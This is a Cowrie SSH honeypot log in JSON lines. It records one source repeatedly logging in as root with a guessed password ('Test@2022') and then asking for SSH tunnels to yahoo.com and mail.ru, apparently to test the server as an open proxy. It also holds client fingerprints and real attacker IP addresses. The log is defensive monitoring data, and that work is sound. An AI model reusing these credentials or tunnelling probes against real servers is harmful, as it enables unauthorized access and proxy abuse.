{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12149,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12149","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.484501Z","session":"377b74708405"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.534747Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.585926Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33919,"dst_ip":"1.2.3.4","dst_port":22,"session":"39c9948e2fcc","protocol":"ssh","message":"New connection: 77.83.207.83:33919 (1.2.3.4:22) [session: 39c9948e2fcc]","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.634336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.635316Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.685008Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.932940Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13766,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13766","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.983552Z","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.033618Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15965,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15965","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.176137Z","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.226149Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":31144,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31144","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.368237Z","session":"39c9948e2fcc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.418701Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.470016Z","src_ip":"77.83.207.83","session":"39c9948e2fcc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34013,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c4fbc7fce79","protocol":"ssh","message":"New connection: 77.83.207.83:34013 (1.2.3.4:22) [session: 9c4fbc7fce79]","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.518902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.519876Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.569728Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.819264Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4503,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4503","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.870566Z","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:20.920712Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18011,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18011","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.064471Z","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.114469Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":30197,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30197","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.256234Z","session":"9c4fbc7fce79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.306282Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.356856Z","src_ip":"77.83.207.83","session":"9c4fbc7fce79"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.403692Z","src_ip":"212.227.235.229","session":"bd1015d61d58"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.404440Z","src_ip":"212.227.235.229","session":"bd1015d61d58"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"9059bfe7fded","protocol":"ssh","message":"New connection: 77.83.207.83:34090 (1.2.3.4:22) [session: 9059bfe7fded]","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.406569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.407454Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.458002Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.session.closed","duration":12.206989288330078,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.633962Z","src_ip":"212.227.235.229","session":"fc7da4cb6157"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.708737Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3441,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3441","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.759970Z","session":"9059bfe7fded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.810424Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":6334,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6334","sensor":"my-vps","timestamp":"2025-08-31T03:43:21.952794Z","session":"9059bfe7fded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.003231Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"18.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 18.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.079981Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.session.closed","duration":"104.4","message":"Connection lost after 104.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.081172Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3714,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3714","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.144682Z","session":"9059bfe7fded"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.195149Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.246189Z","src_ip":"77.83.207.83","session":"9059bfe7fded"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34173,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcf3250160d5","protocol":"ssh","message":"New connection: 77.83.207.83:34173 (1.2.3.4:22) [session: bcf3250160d5]","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.294878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.295938Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.346054Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.595712Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8030,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8030","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.647566Z","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.697703Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19579,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19579","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.840616Z","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:22.891300Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":26459,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26459","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.032475Z","session":"bcf3250160d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.082613Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.133327Z","src_ip":"77.83.207.83","session":"bcf3250160d5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34248,"dst_ip":"1.2.3.4","dst_port":22,"session":"a00b02146aac","protocol":"ssh","message":"New connection: 77.83.207.83:34248 (1.2.3.4:22) [session: a00b02146aac]","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.183162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.184060Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
